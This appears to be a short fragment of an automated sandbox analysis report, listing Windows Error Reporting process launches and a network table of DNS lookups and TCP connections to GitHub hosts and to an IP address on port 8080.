"C:\Windows\system32\WerFaultSecure.exe" -protectedcrash -p 4104 -i 4104 -h 500 -j 504 -s 512 -d 12668

C:\Windows\system32\WerFaultSecure.exe

C:\Windows\system32\WerFaultSecure.exe -u -p 4104 -s 920

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
DE 3.120.98.217:8080 tcp

Files
